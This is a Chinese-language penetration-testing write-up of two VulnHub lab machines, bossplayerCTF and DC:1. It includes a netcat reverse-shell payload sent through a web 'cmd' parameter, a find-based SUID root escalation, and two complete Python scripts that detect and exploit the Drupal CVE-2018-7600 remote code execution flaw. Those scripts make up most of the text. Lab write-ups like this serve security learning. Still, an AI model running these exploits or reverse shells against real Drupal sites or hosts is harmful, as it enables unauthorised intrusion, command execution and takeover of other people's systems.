前言

bossplayerCTF-vulnhub&&DC:1-vulnhub渗透测试

渗透过程思路比较简单，所以就一起写。

bossplayerCTF-vulnhub

写在前面

靶机IP:192.168.1.168

KaLiIP:192.168.1.124

渗透过程

nmap扫描端口

先访问80端口

在源码中看到

解码后得到workinginprogress.php

这里就猜测这里可以执行命令的

访问robots.txt

解码可得：lol try harder bro

感觉是个无用信息

刚才的那个，我们可以用于反弹shell

?cmd=nc+-e+/bin/sh+192.168.1.124+1234

然后find提权

find . -exec /bin/sh -p \; -quit

DC:1-vulnhub

写在前面

靶机IP:192.168.1.166

KaLiIP:192.168.1.124

渗透过程

扫描端口

drupal7，我们尝试CVE-2018-7600可否使用。

扫描工具

#!/usr/bin/env python3
#!coding:utf-8
import requests
import re

print ('###################################')
print ('### POC for drupal CVE-2018-7600')
print ('###################################')
print ('\n')

check_host={
    'http://192.168.1.166'  
}

for host in check_host:
    if host[-1::] != '/':
        host += '/'

    #checking drupal7
    print('\n'+'checking host: '+ host)
    print('checking drupal 7.x ......')

    url = host+'?q=user/password&name[%23post_render][]=system&name[%23markup]=echo%20pwn!!!&name[%23type]=markup'
    data = {
        'form_id':'user_pass',
        '_triggering_element_name':'name'
    }
    r = requests.post(url,data = data,verify = False,timeout = 5)

    result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)

    if result:
        found = result.group(1)
        url = host + '?q=file/ajax/name/%23value/'+found
        data = {'form_build_id' : found}
        r = requests.post(url,data = data,verify = False,timeout = 5)

        if 'pwn' in r.text:
            print('pwn!!!'+'\n'+host)
        else:
            print('fail')
    else:
        print('fail')


    #checking drupal8
    print('\n'+'checking drupal 8.x ......')
    payload = {
    'mail[a][#lazy_builder][0]':(None,'system'),
    'mail[a][#lazy_builder][1][]':(None,'echo pwn!!!'),
    'form_id':(None,'user_register_form')
    }

    headers = {'X-Requested-With': 'XMLHttpRequest'}

    url = host+'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'    
    r = requests.post(url,files = payload, headers = headers,verify = False,timeout = 5)

    if  'pwn' in r.text:
        print('pwn!!!'+'\n'+host)
    else:
        print('fail')

然后使用exp

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
                    by poisoning the recover password form (user/password) and triggering it with
                    the upload file via ajax (/file/ajax).
                    ''')
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, function, command, proxy):
  requests.packages.urllib3.disable_warnings()
  proxies = {'http': proxy, 'https': proxy}
  print('[*] Poisoning a form and including it in cache.')
  get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
  post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
  r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  soup = BeautifulSoup(r.text, "html.parser")
  try:
    form = soup.find('form', {'id': 'user-pass'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/name/#value/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('=============================================================================')
  print ('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
  print ('|                              by pimps                                     |')
  print ('=============================================================================\n')

  args = get_args() # get the cl args
  pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
  main()

成功getshell,然后提权

python -c "import pty; pty.spawn('/bin/bash')"
find -perm -u=s -type f 2>/dev/null

find可提权，然后exim可提取

这里只讲思路了。就不重复了

后记

DC:1是第一个独立做出来的靶机，虽然很简单……